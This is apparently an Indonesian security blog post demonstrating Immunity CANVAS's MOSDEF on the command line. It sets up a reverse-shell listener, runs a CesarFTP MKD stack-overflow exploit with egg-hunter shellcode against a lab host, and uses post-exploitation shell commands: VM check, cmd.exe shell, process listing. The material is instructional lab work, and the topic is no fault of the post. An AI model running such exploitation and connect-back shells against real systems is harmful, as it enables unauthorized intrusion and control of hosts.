Meet MOSDEF!

Untuk yang mengenal meterpreter-nya metasploit lebih dulu tentu akan berpendapat bahwa mosdef-nya Immunity mengikuti konsep meterpreter, in fact…mosdef muncul lebih dulu. Metasploit dulunya ibarat kuda hitam, project opensource yang bisa di bilang menyamai kemampuan commercial product yang memang sudah populer saat itu, yaitu core impact (~ $30k?) dan immunity canvas (~ $1,5k?). Bahkan dulu jika ada yang sempat menikmati MSFGUI milik metasploit dan telah merasakan canvas akan berpendapat metasploit betul-betul ingin mengikuti design GUI-nya CANVAS.

Metasploit yang opensource lebih banyak di pakai dan ditest serta dilengkapi feature-feature nya oleh masyarakat dunia, dalam sekejap punya feature seperti meterpreter yang scalabilitas nya lebih luas dibandingkan canvas dan core impact. Dan sesuai hukum alam, hasil riset komunitas dunia dalam metasploit tentunya sangat profitable jika dapat dimanfaatkan dengan baik oleh industri, persis seperti kisah redhat. Tahun 2010 ini bertepatan dengan satu tahun metasploit di akusisi oleh rapid7, diluncurkan metasploit pro yang konon harganya sampai $15k.

Menakjubkan bukan?!Dengan tetap beralasan bahwa metasploit project akan memiliki simbiosis mutualisme antara komunitas dan industri, maka saat ini metasploit express dan metasploit pro berjalan diatas roda hasil kerja komunitas security dunia (contoh: meterpreter, metasm, library injection, dsb) dengan menambahkan feature untuk kebutuhkan industri security profesional dalam hal penetration testing seperti reporting, grafik yang cantik, platform untuk kolaborasi proses penetration testing antar anggota team, dsb. Bisa dilihat langsung pada situs resminya. Cukup tentang metasploit :-).

Jika kita kembali pada judul posting maka saatnya membahas feature MOSDEF dari Immunity CANVAS. MOSDEF sangat mirip dengan metasploit, Immunity dengan CANVAS-nya memiliki visi membangun sebuah framework exploit berbasis GUI, sehingga untuk penggunaan sehari-hari seorang konsultan biasanya akan menghadapi tampilan grafikal. Terkecuali kalian datang dari komunitas security yang terbiasa menghabiskan waktu dengan teknologi berbasis low-level maka akan sangat tertarik melihat bagaimana CANVAS berjalan melalui console. Berikut ini kita akan melihat bagaimana MOSDEF digunakan dalam proses eksploitasi pada bentuk CLI (Command Line Interface),

Start MOSDEF Listener


$ ./commandlineInterface.py
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
Setting CANVAS session to: default
Using 'Reports/default' as base data output directory
Running command line interface v 1.0
Copyright Immunity, Inc.
If using an MSRPC attack, use the -i fromcreatethread option
Loading osdetect ... [ ok ]
Loading addhost ... [ ok ]
Loading gethostbyname ... [ ok ]
Loading emailsender ... [ ok ]
Loading startservice ... [ ok ]
Loading userenum ... [ ok ]
Loading shareenum ... [ ok ]
[ Thu Oct 21 20:53:22 2010 ]No country exclude list loaded
[ Thu Oct 21 20:53:22 2010 ][*] CANVAS Started [*]
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
[ Thu Oct 21 20:53:22 2010 ]Cannot import pyuno - reporting engine can do XML only

Command Line Interface Version 1.0, Immunity, Inc.
usage: commandlineInterface.py -p port -v [-i initstring] [-l localip (for HTTP)]
initstring values:
fromcreatethread (used for MSRPC attacks, for example)

0) WIN32 MOSDEF INTEL
1) WIN32 MODSEF INTEL FromCreateThread
2) WIN64 MOSDEF INTEL
3) LINUX MOSDEF INTEL
4) LINUX EXECVE INTEL
5) HTTP MOSDEF PLAINTEXT
6) HTTP MOSDEF SSL
7) PHP MULTI OS
8) OSX MOSDEF INTEL
9) OSX MOSDEF PPC
10) FREEBSD MOSDEF INTEL
11) SOLARIS MOSDEF SPARC
12) SOLARIS MOSDEF INTEL
13) AIX 5.1 MOSDEF PPC
14) AIX 5.2 MOSDEF PPC
15) JAVA MOSDEF
16) UNIXSHELL
17) Universal MOSDEF
[ Thu Oct 21 20:53:29 2010 ]Newest version available is: 6.63 October 20th, 2010, your version is 6.59 June 21,
2010. You might want to upgrade to a more current version.

MOSDEF membutuhkan dua buah console (pada contoh ini saya menggunakan terminal Mac OSX), pada console pertama kita akan mengaktifkan listener yang nantinya digunakan sebagai reverse-shell setelah proses eksploitasi terjadi. Dapat dilihat beberapa MOSDEF dapat digunakan sesuai dengan target, diantaranya MOSDEF untuk Windows, UNIX, Linux, FreeBSD, dsb. Pada contoh saat ini saya akan menggunakan target yang sama dengan tulisan sebelumnya, yaitu cesarftp server. Sehingga MOSDEF yang digunakan adalah WIN32 MOSDEF INTEL.


$ ./commandlineInterface.py -p 31337 -v 0
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
Setting CANVAS session to: default
Using 'Reports/default' as base data output directory
Running command line interface v 1.0
Copyright Immunity, Inc.
If using an MSRPC attack, use the -i fromcreatethread option
Loading osdetect ... [ ok ]
Loading addhost ... [ ok ]
Loading gethostbyname ... [ ok ]
Loading emailsender ... [ ok ]
Loading startservice ... [ ok ]
Loading userenum ... [ ok ]
Loading shareenum ... [ ok ]
[ Thu Oct 21 20:54:15 2010 ]No country exclude list loaded
[ Thu Oct 21 20:54:15 2010 ][*] CANVAS Started [*]
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
[ Thu Oct 21 20:54:15 2010 ]Cannot import pyuno - reporting engine can do XML only
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
Localhost set to 172.16.136.1
[ Thu Oct 21 20:54:15 2010 ]Binding to :31337

Run The Exploit

Setelah MOSDEF siap, maka selanjutnya tinggal memilih eksploit yang digunakan dengan metode CLI.


$ ./exploits/cesarftp/cesarftp.py -v 1 -t 192.168.2.101 -p 21 -l 192.168.2.100 -d 31337 -C 5
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
Setting CANVAS session to: default
Using 'Reports/default' as base data output directory
Running CANVAS CesarFTP Stack Overflow on MKD command Exploit v 1.0
Loading osdetect ... [ ok ]
Loading addhost ... [ ok ]
Loading gethostbyname ... [ ok ]
Loading emailsender ... [ ok ]
Loading startservice ... [ ok ]
Loading userenum ... [ ok ]
Loading shareenum ... [ ok ]
[ Thu Oct 21 20:58:11 2010 ]No country exclude list loaded
[ Thu Oct 21 20:58:11 2010 ][*] CANVAS Started [*]
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
[ Thu Oct 21 20:58:11 2010 ]Cannot import pyuno - reporting engine can do XML only
localhost=192.168.2.100
[ Thu Oct 21 20:58:11 2010 ][C] (192.168.2.101/32) Generating typical Win32 shellcode
[ Thu Oct 21 20:58:12 2010 ][C] (192.168.2.101/32) Raw shellcode (before encoding) is 566 byte
[ Thu Oct 21 20:58:12 2010 ][C] (192.168.2.101/32) Encoding shellcode. This may take a while if we dont find
a good value in the cache.
[ Thu Oct 21 20:58:12 2010 ][C] (192.168.2.101/32) Intel Encoding raw shellcode of length 566
[ Thu Oct 21 20:58:12 2010 ][C] (192.168.2.101/32) Trying additive encoder
Encoding 0x8e words of data in addencoder
[ Thu Oct 21 20:58:18 2010 ]Newest version available is: 6.63 October 20th, 2010, your version is 6.59 June 21,
2010. You might want to upgrade to a more current version.
Error: Did not find split for your shellcode!
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Using chunked encoder (minimum chunk of 80)
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Used chunked additive encoder
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Done encoding shellcode.
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Tag1: /8,/ Tag2: 6/2.
Searchcode length: 135
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Intel Encoding raw shellcode of length 135
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Trying xor encoder
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Length of search shellcode: 135, length of real shellcode:
671
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Attacking 192.168.2.101:21
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Recieved banner: 220 CesarFTP 0.99g Server Welcome !
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) USER command sent (331 User login OK, waiting for password
)
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) PASS command sent (230 User password OK, CesarFTP server ready
)
[ Thu Oct 21 20:59:40 2010 ][C] (192.168.2.101/32) Attack reported no open socket - service died?
[C] Module succeeded!
[C] done -- connectback set to 192.168.2.100:31337

Jika proses eksploitasi berjalan dengan baik, maka kita akan mendapatkan MOSEF shell.


...
[ Thu Oct 21 20:54:15 2010 ]Binding to :31337
[ Thu Oct 21 20:59:20 2010 ]Connected to by ('192.168.2.101', 28455)
[ Thu Oct 21 20:59:20 2010 ]new_node_connection on WIN32 MOSDEF INTEL
[ Thu Oct 21 20:59:20 2010 ]Starting up a WIN32 MOSDEF INTEL Server
XORKEY=4b
[ Thu Oct 21 20:59:20 2010 ]XOR Key set to 0x4b
[ Thu Oct 21 20:59:20 2010 ]Starting up Win32 MOSDEF Node !
[ Thu Oct 21 20:59:20 2010 ]Argsdict = {}
[ Thu Oct 21 20:59:20 2010 ]Getting fd, main functions, and initing main MOSDEF LOOP
[ Thu Oct 21 20:59:21 2010 ]Reading remote fd
[ Thu Oct 21 20:59:21 2010 ]NOTE: If the process stalls here, it is possible you did not set -i fromcreatethread
! It is also possible DEP on XP SP2 or Windows 2003 or Windows Vista has killed the
process
[ Thu Oct 21 20:59:21 2010 ]Self.fd = 00000688
[ Thu Oct 21 20:59:21 2010 ]GetProcAddress=7c80ae40
[ Thu Oct 21 20:59:21 2010 ]LoadLibraryA=7c801d7b
[ Thu Oct 21 20:59:21 2010 ]Send=71ab4c27
[ Thu Oct 21 20:59:21 2010 ]Setting up Win32 dynamic linking assembly component server
XORKEY=4b
[ Thu Oct 21 20:59:21 2010 ]Initialized Local Functions.
[ Thu Oct 21 20:59:21 2010 ]kernel32.dll|GlobalAlloc not in cache - retrieving remotely.
Loadlibrary kernel32.dll = 7c800000
[ Thu Oct 21 20:59:21 2010 ]Found kernel32.dll|GlobalAlloc at 7c80fdcd
[ Thu Oct 21 20:59:21 2010 ]kernel32.dll|GlobalFree not in cache - retrieving remotely.
[ Thu Oct 21 20:59:22 2010 ]Found kernel32.dll|GlobalFree at 7c80fccf
[ Thu Oct 21 20:59:22 2010 ]ws2_32.dll|recv not in cache - retrieving remotely.
Loadlibrary ws2_32.dll = 71ab0000
[ Thu Oct 21 20:59:22 2010 ]Found ws2_32.dll|recv at 71ab676f
[ Thu Oct 21 20:59:22 2010 ]kernel32.dll|GetLocaleInfoA not in cache - retrieving remotely.
[ Thu Oct 21 20:59:23 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|GetLocaleInfoA at 7c80d302
[ Thu Oct 21 20:59:23 2010 ]Calling findInterfaces
[ Thu Oct 21 20:59:23 2010 ]iphlpapi.dll|GetIpAddrTable not in cache - retrieving remotely.
Using loadlibrary_withmalloc! (iphlpapi.dll)
[ Thu Oct 21 20:59:24 2010 ]Loadlibrary iphlpapi.dll = 76d60000
[ Thu Oct 21 20:59:24 2010 ]Getprocaddr_withmalloc: Found iphlpapi.dll|GetIpAddrTable at 76d63b9c
[ Thu Oct 21 20:59:24 2010 ]kernel32.dll|VirtualAlloc not in cache - retrieving remotely.
[ Thu Oct 21 20:59:25 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|VirtualAlloc at 7c809af1
[ Thu Oct 21 20:59:25 2010 ]kernel32.dll|VirtualFree not in cache - retrieving remotely.
[ Thu Oct 21 20:59:25 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|VirtualFree at 7c809b84
[ Thu Oct 21 20:59:25 2010 ]Done with new Node startup.
[ Thu Oct 21 20:59:25 2010 ]10:38 luckily cockroaches have many (and easily detachable) appendages.
They're like a little portable abacus.
Loading startup ... [ ok ]
[ Thu Oct 21 20:59:25 2010 ][C] (127.0.0.1/32) Automatic startup in progress
Loading checkvm ... [ ok ]
[ Thu Oct 21 20:59:25 2010 ][!] Checking if we're inside a VirtualMachine
[ Thu Oct 21 20:59:26 2010 ][!] Looks like we're on virtual hardware :)
[ Thu Oct 21 20:59:26 2010 ][C] (127.0.0.1/32) checkvm -> Host is likely to be a VirtualMachine
[ Thu Oct 21 20:59:26 2010 ]Automatic startup done
[ Thu Oct 21 20:59:26 2010 ]Done handling a new Listener Connection
Letting user interact with server

Win32/MOSDEF$ help

? - Print out useful help messages!
c - Runs a command via popen
chdir - Called by the shellserver to change into a new directory
checkvm - checks if we're inside a VM by checking for a relocated idt
cz - call zero
d - Downloads a file to the session directory e.g. /Reports/default/192.168.1.1/downlaods/file.doc
de - Exit Thread
dodir - Get directory listings from a directory on the remote machine.
dokill - Kills a process identified by pid.
dounlink - Delete a file ("unlink" it) on the remote machine
getpid - No help available
getppid - No help available
h - Print out useful help messages!
help - Print out useful help messages!
id - Not implemented on this shell
mkdir - Makes a directory on the remote machine (ASCII directory names only)
p - calls getcwd()
ps - Print a tree of the process listing. Like the pstree command on Unix.
pt - Prints all valid thread tokens(win32)
quit - Exit the shell entirely
re - Exit the process
reload - Reload a CANVAS module if the code has been changed while CANVAS has been running e.g. reload screengrab
runmodule - When you call "runmodule whoami -O k:8 -O b:9", this is where you end up. args is: whoami -O -k:8 -O b:9 TODO: proper parser on argument string!
seteuid - No help available
shellshock - win32 cmd.exe shellshock, modified from dave's popen2
st - Sets the thread token (0 for reverttoself) thread is actually supposed to be a pointer to a thread... on fail returns 0
tcpscan - TCP Connect scan from the remote host. Args: network to scan, startport, endport
u - Upload a file to the remote host

Win32/MOSDEF$ checkvm
[ Thu Oct 21 21:00:04 2010 ][!] Checking if we're inside a VirtualMachine
[ Thu Oct 21 21:00:04 2010 ][!] Looks like we're on virtual hardware :)
128

Win32/MOSDEF$ shellshock
[ Thu Oct 21 21:00:29 2010 ]kernel32.dll|GetEnvironmentVariableA not in cache - retrieving remotely.
[ Thu Oct 21 21:00:29 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|GetEnvironmentVariableA at 7c814b92
Set cached_comspec to C:\WINDOWS\system32\cmd.exe
[ Thu Oct 21 21:00:30 2010 ]kernel32.dll|CreatePipe not in cache - retrieving remotely.
[ Thu Oct 21 21:00:30 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|CreatePipe at 7c81d83f
[ Thu Oct 21 21:00:30 2010 ]kernel32.dll|GetCurrentProcess not in cache - retrieving remotely.
[ Thu Oct 21 21:00:30 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|GetCurrentProcess at 7c80de95
[ Thu Oct 21 21:00:31 2010 ]kernel32.dll|DuplicateHandle not in cache - retrieving remotely.
[ Thu Oct 21 21:00:31 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|DuplicateHandle at 7c80de9e
[ Thu Oct 21 21:00:32 2010 ]kernel32.dll|CloseHandle not in cache - retrieving remotely.
[ Thu Oct 21 21:00:32 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|CloseHandle at 7c809be7
[ Thu Oct 21 21:00:32 2010 ]kernel32.dll|GetStartupInfoA not in cache - retrieving remotely.
[ Thu Oct 21 21:00:32 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|GetStartupInfoA at 7c801ef2
[ Thu Oct 21 21:00:32 2010 ]kernel32.dll|CreateProcessA not in cache - retrieving remotely.
[ Thu Oct 21 21:00:33 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|CreateProcessA at 7c80236b
[ Thu Oct 21 21:00:33 2010 ]kernel32.dll|ReadFile not in cache - retrieving remotely.
[ Thu Oct 21 21:00:33 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|ReadFile at 7c801812
[ Thu Oct 21 21:00:33 2010 ]kernel32.dll|WriteFile not in cache - retrieving remotely.
[ Thu Oct 21 21:00:33 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|WriteFile at 7c810e27
[ Thu Oct 21 21:00:33 2010 ]kernel32.dll|PeekNamedPipe not in cache - retrieving remotely.
[ Thu Oct 21 21:00:33 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|PeekNamedPipe at 7c860977
[ Thu Oct 21 21:00:33 2010 ]ws2_32.dll|select not in cache - retrieving remotely.
[ Thu Oct 21 21:00:34 2010 ]Getprocaddr_withmalloc: Found ws2_32.dll|select at 71ab30a8
[!] Turning MOSDEF-Node into temporary interactive shell
[!] Note: will revert back to MOSDEF on "exit"
shellshocked!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\mrs\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8C23-6511

Directory of C:\Documents and Settings\mrs\Desktop

10/21/2010 05:04 PM .
10/21/2010 05:04 PM ..
04/30/2010 11:03 AM 660 010 Editor v3.lnk
09/28/2010 04:09 AM 630 CesarFTP.lnk
01/26/2010 04:47 PM 575 IDA Pro Advanced (32-bit).lnk
04/22/2009 01:36 PM 1,059 Microsoft Visual Studio 2008.lnk
10/17/2010 04:39 AM 811 NBA 2K10.lnk
10/21/2010 04:59 PM paimei
5 File(s) 3,735 bytes
3 Dir(s) 5,711,056,896 bytes free

C:\Documents and Settings\mrs\Desktop>exit
exit
[!] Cleaning up left over muckery, please remain seated..
[!] Your regular MOSDEF programming will return shortly..

Win32/MOSDEF$ ps
[ Thu Oct 21 21:00:47 2010 ]kernel32.dll|CreateToolhelp32Snapshot not in cache - retrieving remotely.
[ Thu Oct 21 21:00:48 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|CreateToolhelp32Snapshot at 7c865c7f
[ Thu Oct 21 21:00:48 2010 ]kernel32.dll|Process32First not in cache - retrieving remotely.
[ Thu Oct 21 21:00:48 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|Process32First at 7c864f55
[ Thu Oct 21 21:00:48 2010 ]kernel32.dll|Process32Next not in cache - retrieving remotely.
[ Thu Oct 21 21:00:48 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|Process32Next at 7c8650c8
[{'ppid': 0, 'cntThreads': 1, 'exe': '[System Process]', 'pid': 0}, {'ppid': 0, 'cntThreads': 60, 'exe': 'System', 'pid': 4}, {'ppid': 4, 'cntThreads': 3, 'exe': 'smss.exe', 'pid': 564}, {'ppid': 564, 'cntThreads': 12, 'exe': 'csrss.exe', 'pid': 628}, {'ppid': 564, 'cntThreads': 19, 'exe': 'winlogon.exe', 'pid': 652}, {'ppid': 652, 'cntThreads': 16, 'exe': 'services.exe', 'pid': 696}, {'ppid': 652, 'cntThreads': 20, 'exe': 'lsass.exe', 'pid': 708}, {'ppid': 696, 'cntThreads': 1, 'exe': 'vmacthlp.exe', 'pid': 868}, {'ppid': 696, 'cntThreads': 15, 'exe': 'svchost.exe', 'pid': 884}, {'ppid': 696, 'cntThreads': 10, 'exe': 'svchost.exe', 'pid': 960}, {'ppid': 696, 'cntThreads': 67, 'exe': 'svchost.exe', 'pid': 1056}, {'ppid': 696, 'cntThreads': 6, 'exe': 'svchost.exe', 'pid': 1100}, {'ppid': 696, 'cntThreads': 13, 'exe': 'svchost.exe', 'pid': 1168}, {'ppid': 696, 'cntThreads': 10, 'exe': 'spoolsv.exe', 'pid': 1392}, {'ppid': 696, 'cntThreads': 4, 'exe': 'svchost.exe', 'pid': 1536}, {'ppid': 696, 'cntThreads': 5, 'exe': 'jqs.exe', 'pid': 1600}, {'ppid': 696, 'cntThreads': 5, 'exe': 'vmtoolsd.exe', 'pid': 1680}, {'ppid': 696, 'cntThreads': 3, 'exe': 'VMUpgradeHelper.exe', 'pid': 1788}, {'ppid': 696, 'cntThreads': 5, 'exe': 'alg.exe', 'pid': 844}, {'ppid': 1056, 'cntThreads': 1, 'exe': 'wscntfy.exe', 'pid': 1164}, {'ppid': 536, 'cntThreads': 1, 'exe': 'VMwareTray.exe', 'pid': 1580}, {'ppid': 536, 'cntThreads': 7, 'exe': 'VMwareUser.exe', 'pid': 1644}, {'ppid': 536, 'cntThreads': 1, 'exe': 'jusched.exe', 'pid': 832}, {'ppid': 536, 'cntThreads': 3, 'exe': 'Updater.exe', 'pid': 1700}, {'ppid': 536, 'cntThreads': 2, 'exe': 'daemon.exe', 'pid': 388}, {'ppid': 1056, 'cntThreads': 3, 'exe': 'wuauclt.exe', 'pid': 1992}, {'ppid': 696, 'cntThreads': 8, 'exe': 'svchost.exe', 'pid': 2140}, {'ppid': 652, 'cntThreads': 12, 'exe': 'explorer.exe', 'pid': 3512}, {'ppid': 3512, 'cntThreads': 1, 'exe': 'cmd.exe', 'pid': 3200}, {'ppid': 3512, 'cntThreads': 3, 'exe': 'CesarFTP.exe', 'pid': 3188}, {'ppid': 3188, 'cntThreads': 6, 'exe': 'Server.exe', 'pid': 3916}]

Walaupun tujuan utama dari design CANVAS adalah membuat exploit framework yang dapat dipakai dalam bentuk grafik, tapi menggunakan model console seperti ini tetap berguna. Kita bisa lihat *output* nya sangat berisik, namun untuk yang memahami akan melihat keindahan step-by-step proses eksploitasi CANVAS dimana banyak eksploitnya menggunakan trik-trik unik dan cerdas. Itu sebabnya kadang ada beberapa eksploitasi yang gagal pada suatu mesin ketika menggunakan metasploit, tapi tembus jika menggunakan CANVAS. Untuk yang memiliki hobi kutak-katik framework serta mengembangkan eksploit baik untuk kebutuhan pribadi ataupun perusahaan juga tentunya bisa memilih sesuai selera, apakah menggunakan ruby atau menggunakan python ;).

Jika ada yang memperhatikan maka bisa mengenali bahwa proses eksploitasi cesarftp ini menggunakan tehnik yg disebut egg-hunter.


...
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Using chunked encoder (minimum chunk of 80)
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Used chunked additive encoder
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Done encoding shellcode.
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Tag1: /8,/ Tag2: 6/2.
Searchcode length: 135
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Intel Encoding raw shellcode of length 135
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Trying xor encoder
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Length of search shellcode: 135, length of real shellcode:
671
...

Bagi yang masih ingat dengan tulisan sebelumnya, cesarftp membatasi jumlah payload dalam stack. Dan pada tulisan sebelumnya digunakan payload milik skypher yang kebetulan mencukupi. Pada payload CANVAS diatas sebenarnya untuk membangkitkan MOSDEF dibutuhkan real-shellcode sebesar 671 bytes, namun dengan tehnik egg-hunter maka real-shellcode tersebut di-eksekusi pada stage-2. Stage-1 shellcode hanya berjumlah 135 bytes, shellcode tersebut bertugas mencari lokasi real-shellcode dan membuat alur eksekusi processor menuju real-shellcode dengan sempurna.

Tutorial lengkap dan lebih mendetail mengenai egg-hunter shellcode pada microsoft windows bisa dilihat pada blog peter van eeckhoutte.

Have fun with your MOSDEF :-).

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s